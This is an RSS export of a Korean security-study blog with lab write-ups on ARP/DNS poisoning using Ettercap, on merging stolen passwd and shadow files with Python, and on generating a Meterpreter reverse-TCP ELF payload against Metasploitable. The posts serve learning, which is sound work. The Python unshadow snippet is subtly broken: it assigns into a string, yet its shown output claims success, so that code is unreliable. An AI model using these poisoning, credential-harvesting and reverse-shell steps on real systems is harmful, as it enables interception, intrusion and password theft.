<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
  <channel>
    <title>0HP</title>
    <link>https://it-mandarine.tistory.com/</link>
    <description>정보보안 학습내용 복습하는 블로그입니다.</description>
    <language>ko</language>
    <pubDate>Wed, 8 Apr 2026 16:47:29 +0900</pubDate>
    <generator>TISTORY</generator>
    <ttl>100</ttl>
    <managingEditor>Pulseeee</managingEditor>
    <item>
      <title>MITM</title>
      <link>https://it-mandarine.tistory.com/79</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;Ettercap (ARP, DNS) 을 이용한&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;ARP Poisoning&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;DNS Poisoning 공격&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;목표 : 공격 대상자가 외부에게 전송된 패킷이 Gateway를 통과하기 전 공격자가 중간에 개입하여 패킷이 공격자를 통해 패킷이&amp;nbsp; Gateway로 내보내지고 Gateway에서 들어온 응답을 공격자를 거쳐 공격 대상자 에게 보내지게 한다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;구분&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;운영체제&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;IP주소&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;공격 대상자&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;Windows 10&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;192.168.0.20&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;공격 대상자&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;192.168.0.1&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;공격자&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;칼리리눅스 2022.04&lt;/td&gt;
&lt;td style=&quot;width: 33.3333%; text-align: center;&quot;&gt;192.168.0.29&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;310&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/RyDed/btrZJDw4GXu/tN150RoEV1bMPJNj6zGuj1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/RyDed/btrZJDw4GXu/tN150RoEV1bMPJNj6zGuj1/img.png&quot; data-alt=&quot;CentOS7 ns1의 DNS를 CentOS7 ns1의 IP주소로 바꾼다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/RyDed/btrZJDw4GXu/tN150RoEV1bMPJNj6zGuj1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FRyDed%2FbtrZJDw4GXu%2FtN150RoEV1bMPJNj6zGuj1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;903&quot; height=&quot;310&quot; data-origin-width=&quot;903&quot; data-origin-height=&quot;310&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;CentOS7 ns1의 DNS를 CentOS7 ns1의 IP주소로 바꾼다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;513&quot; data-origin-height=&quot;101&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/omvM2/btrZJCZzukT/g5MTH5j3ZewD4oDt63ahD0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/omvM2/btrZJCZzukT/g5MTH5j3ZewD4oDt63ahD0/img.png&quot; data-alt=&quot;칼리 리눅스 etter.dns 파일은 DNS응답 IP를 조작하기 위해 사DNS spisoning에 사용된다.&amp;amp;nbsp; 조작할 내용을 추가한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/omvM2/btrZJCZzukT/g5MTH5j3ZewD4oDt63ahD0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FomvM2%2FbtrZJCZzukT%2Fg5MTH5j3ZewD4oDt63ahD0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;513&quot; height=&quot;101&quot; data-origin-width=&quot;513&quot; data-origin-height=&quot;101&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;칼리 리눅스 etter.dns 파일은 DNS응답 IP를 조작하기 위해 사DNS spisoning에 사용된다.&amp;nbsp; 조작할 내용을 추가한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;799&quot; data-origin-height=&quot;490&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/sHdYj/btrZJWp1qSl/57rLBvG3C7NcduhB01DqA1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/sHdYj/btrZJWp1qSl/57rLBvG3C7NcduhB01DqA1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/sHdYj/btrZJWp1qSl/57rLBvG3C7NcduhB01DqA1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FsHdYj%2FbtrZJWp1qSl%2F57rLBvG3C7NcduhB01DqA1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;799&quot; height=&quot;490&quot; data-origin-width=&quot;799&quot; data-origin-height=&quot;490&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dntqCf/btrZIgQwvqr/O9HVTkgxlMA48s7D1NTHGk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dntqCf/btrZIgQwvqr/O9HVTkgxlMA48s7D1NTHGk/img.png&quot; data-origin-width=&quot;821&quot; data-origin-height=&quot;482&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.6228%; margin-right: 10px;&quot; data-widthpercent=&quot;50.21&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dntqCf/btrZIgQwvqr/O9HVTkgxlMA48s7D1NTHGk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdntqCf%2FbtrZIgQwvqr%2FO9HVTkgxlMA48s7D1NTHGk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;821&quot; height=&quot;482&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dvPBSL/btrZIthNJrf/hogMWWLLWSvuBenjYbjg0k/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dvPBSL/btrZIthNJrf/hogMWWLLWSvuBenjYbjg0k/img.png&quot; data-origin-width=&quot;821&quot; data-origin-height=&quot;486&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.2144%;&quot; data-widthpercent=&quot;49.79&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dvPBSL/btrZIthNJrf/hogMWWLLWSvuBenjYbjg0k/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdvPBSL%2FbtrZIthNJrf%2FhogMWWLLWSvuBenjYbjg0k%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;821&quot; height=&quot;486&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;게이트웨이와 리눅스의 mac주소를 칼리리눅스의 mac주소로 바꿔야하기 때문에 타겟으로 지정해준다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;815&quot; data-origin-height=&quot;482&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/baKCyv/btrZIGapfTf/wHiUZ1UUPUqrcK9MsgxYF0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/baKCyv/btrZIGapfTf/wHiUZ1UUPUqrcK9MsgxYF0/img.png&quot; data-alt=&quot;ARP poisoning 공격을 실행한다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/baKCyv/btrZIGapfTf/wHiUZ1UUPUqrcK9MsgxYF0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbaKCyv%2FbtrZIGapfTf%2FwHiUZ1UUPUqrcK9MsgxYF0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;815&quot; height=&quot;482&quot; data-origin-width=&quot;815&quot; data-origin-height=&quot;482&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;ARP poisoning 공격을 실행한다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;679&quot; data-origin-height=&quot;198&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/nKzeg/btrZD1tpzgc/tMdkqqy1igIpopbLoBYc6K/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/nKzeg/btrZD1tpzgc/tMdkqqy1igIpopbLoBYc6K/img.png&quot; data-alt=&quot;공격자인 칼리 리눅스의 mac주소는 00:50:56:07:02:93이다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/nKzeg/btrZD1tpzgc/tMdkqqy1igIpopbLoBYc6K/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FnKzeg%2FbtrZD1tpzgc%2FtMdkqqy1igIpopbLoBYc6K%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;679&quot; height=&quot;198&quot; data-origin-width=&quot;679&quot; data-origin-height=&quot;198&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격자인 칼리 리눅스의 mac주소는 00:50:56:07:02:93이다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;416&quot; data-origin-height=&quot;77&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bTwgEv/btrZIS9wvEr/aEwNBeHgKyTkrZt006fi00/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bTwgEv/btrZIS9wvEr/aEwNBeHgKyTkrZt006fi00/img.png&quot; data-alt=&quot;게이트웨이의 mac주소가 칼리리눅스의 mac주소로 바뀐것을 확인할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bTwgEv/btrZIS9wvEr/aEwNBeHgKyTkrZt006fi00/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbTwgEv%2FbtrZIS9wvEr%2FaEwNBeHgKyTkrZt006fi00%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;416&quot; height=&quot;77&quot; data-origin-width=&quot;416&quot; data-origin-height=&quot;77&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;게이트웨이의 mac주소가 칼리리눅스의 mac주소로 바뀐것을 확인할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imagegridblock&quot;&gt;
  &lt;div class=&quot;image-container&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bqEy9N/btrZJC6qG5I/qsJUntF5Az5yYCJx4ANIwK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bqEy9N/btrZJC6qG5I/qsJUntF5Az5yYCJx4ANIwK/img.png&quot; data-origin-width=&quot;819&quot; data-origin-height=&quot;486&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.3397%; margin-right: 10px;&quot; data-widthpercent=&quot;49.92&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bqEy9N/btrZJC6qG5I/qsJUntF5Az5yYCJx4ANIwK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbqEy9N%2FbtrZJC6qG5I%2FqsJUntF5Az5yYCJx4ANIwK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;819&quot; height=&quot;486&quot;/&gt;&lt;/span&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/HxxDY/btrZHJTiII1/VhWl1jPpicb6gVFju0ECV0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/HxxDY/btrZHJTiII1/VhWl1jPpicb6gVFju0ECV0/img.png&quot; data-origin-width=&quot;825&quot; data-origin-height=&quot;488&quot; data-is-animation=&quot;false&quot; style=&quot;width: 49.4975%;&quot; data-widthpercent=&quot;50.08&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/HxxDY/btrZHJTiII1/VhWl1jPpicb6gVFju0ECV0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHxxDY%2FbtrZHJTiII1%2FVhWl1jPpicb6gVFju0ECV0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;825&quot; height=&quot;488&quot;/&gt;&lt;/span&gt;&lt;/div&gt;
  &lt;figcaption&gt;Manage plugins를 클릭하여 dns_spoof를 더블 클릭하여 응답을 조작하기 위한 파일을 적용 시킨다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock widthContent&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;414&quot; data-origin-height=&quot;357&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/brpe5r/btrZKp6z94t/7tVOG1t4mtf8eA3IJBrXEK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/brpe5r/btrZKp6z94t/7tVOG1t4mtf8eA3IJBrXEK/img.png&quot; data-alt=&quot;공격 대상자 PC에서 질의를 했을때 오염된 정보가 돌아 오는 것을 확인 할 수 있다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/brpe5r/btrZKp6z94t/7tVOG1t4mtf8eA3IJBrXEK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbrpe5r%2FbtrZKp6z94t%2F7tVOG1t4mtf8eA3IJBrXEK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;414&quot; height=&quot;357&quot; data-origin-width=&quot;414&quot; data-origin-height=&quot;357&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;공격 대상자 PC에서 질의를 했을때 오염된 정보가 돌아 오는 것을 확인 할 수 있다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/79</guid>
      <comments>https://it-mandarine.tistory.com/79#entry79comment</comments>
      <pubDate>Fri, 17 Feb 2023 17:46:47 +0900</pubDate>
    </item>
    <item>
      <title>Unshadow</title>
      <link>https://it-mandarine.tistory.com/77</link>
      <description>&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;994&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bLT3mu/btrZkyxsU7k/SCRmI6JY611AVE7fevFmb1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bLT3mu/btrZkyxsU7k/SCRmI6JY611AVE7fevFmb1/img.png&quot; data-alt=&quot;침투하여 추출해온 passwd와 shadow 파일을 unshadow명령어를 이용하여 unshadow가 가능하다.&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bLT3mu/btrZkyxsU7k/SCRmI6JY611AVE7fevFmb1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbLT3mu%2FbtrZkyxsU7k%2FSCRmI6JY611AVE7fevFmb1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;900&quot; height=&quot;994&quot; data-origin-width=&quot;900&quot; data-origin-height=&quot;994&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;침투하여 추출해온 passwd와 shadow 파일을 unshadow명령어를 이용하여 unshadow가 가능하다.&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;파이썬을 이용한 unshadow&lt;/b&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;import&amp;nbsp;os &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;import&amp;nbsp;re &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;file&amp;nbsp;=&amp;nbsp;open('shadow',&amp;nbsp;'r') &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;shadow&amp;nbsp;=&amp;nbsp;file.read().rstrip().split('\n') &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;file.close() &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;file&amp;nbsp;=&amp;nbsp;open('passwd',&amp;nbsp;'r') &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;passwd&amp;nbsp;=&amp;nbsp;file.read().rstrip().split('\n') &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;file.close() &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;passwd2&amp;nbsp;=&amp;nbsp;{} &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;for&amp;nbsp;row&amp;nbsp;in&amp;nbsp;passwd: &lt;br /&gt;...&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;words&amp;nbsp;=&amp;nbsp;row.split(':') &lt;br /&gt;...&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;passwd2[words[0]]&amp;nbsp;=&amp;nbsp;words[1] &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;shadow2&amp;nbsp;=&amp;nbsp;{} &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;for&amp;nbsp;row&amp;nbsp;in&amp;nbsp;shadow: &lt;br /&gt;...&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;words&amp;nbsp;=&amp;nbsp;row.split(':') &lt;br /&gt;...&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;shadow2[words[0]]&amp;nbsp;=&amp;nbsp;words[1] &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;unshadowed_passwd&amp;nbsp;=&amp;nbsp;&quot;&quot; &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;for&amp;nbsp;user,&amp;nbsp;value&amp;nbsp;in&amp;nbsp;passwd2.items(): &lt;br /&gt;...&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;value[0]&amp;nbsp;=&amp;nbsp;shadow2[user] &lt;br /&gt;...&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;text&amp;nbsp;=&amp;nbsp;&quot;:&quot;.join(value) &lt;br /&gt;...&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;unshadowed_passwd&amp;nbsp;+=&amp;nbsp;user&amp;nbsp;+&amp;nbsp;&quot;:&quot;&amp;nbsp;+&amp;nbsp;text&amp;nbsp;+&amp;nbsp;&quot;\n&quot; &lt;br /&gt;... &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;file&amp;nbsp;=&amp;nbsp;open&amp;nbsp;(&quot;unshadowed_passwd&quot;,&amp;nbsp;&quot;w&quot;) &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;file.write(unshadowed_passwd) &lt;br /&gt;2093 &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt; &lt;br /&gt;&amp;gt;&amp;gt;&amp;gt;&amp;nbsp;file.close()&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;823&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/b9EAdm/btrZlXKBqtB/emafVuYEfSFkagEoUi1DKK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/b9EAdm/btrZlXKBqtB/emafVuYEfSFkagEoUi1DKK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/b9EAdm/btrZlXKBqtB/emafVuYEfSFkagEoUi1DKK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fb9EAdm%2FbtrZlXKBqtB%2FemafVuYEfSFkagEoUi1DKK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;905&quot; height=&quot;823&quot; data-origin-width=&quot;905&quot; data-origin-height=&quot;823&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>Kali Linux</category>
      <author>Pulseeee</author>
      <guid isPermaLink="true">https://it-mandarine.tistory.com/77</guid>
      <comments>https://it-mandarine.tistory.com/77#entry77comment</comments>
      <pubDate>Wed, 15 Feb 2023 14:25:51 +0900</pubDate>
    </item>
    <item>
      <title>악성 코드를 이용한 리눅스 침투</title>
      <link>https://it-mandarine.tistory.com/76</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;table style=&quot;border-collapse: collapse; width: 100%;&quot; border=&quot;1&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;구분&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;운영체제&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;IP 주소&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;비고&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;공격 대상자&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;Metasploitable&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;192.168.0.23&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;게스트 OS&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;공격자&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;Kali Linux 2022.4&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;192.168.0.29&lt;/b&gt;&lt;/td&gt;
&lt;td style=&quot;width: 25%; text-align: center;&quot;&gt;&lt;b&gt;게스트 OS&lt;/b&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;--arch=x86&amp;nbsp; &amp;nbsp; &amp;nbsp; (아키텍처 32bit)&lt;br /&gt;--paltform=linux&amp;nbsp; (linux운영체제)&lt;br /&gt;--format=elf&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;(linux운영체제에서 사용하는 확장자)&lt;br /&gt;--payload=linux/x86/meterpreter_reverse_tcp&amp;nbsp; (악성 코드 종류)&lt;/p&gt;
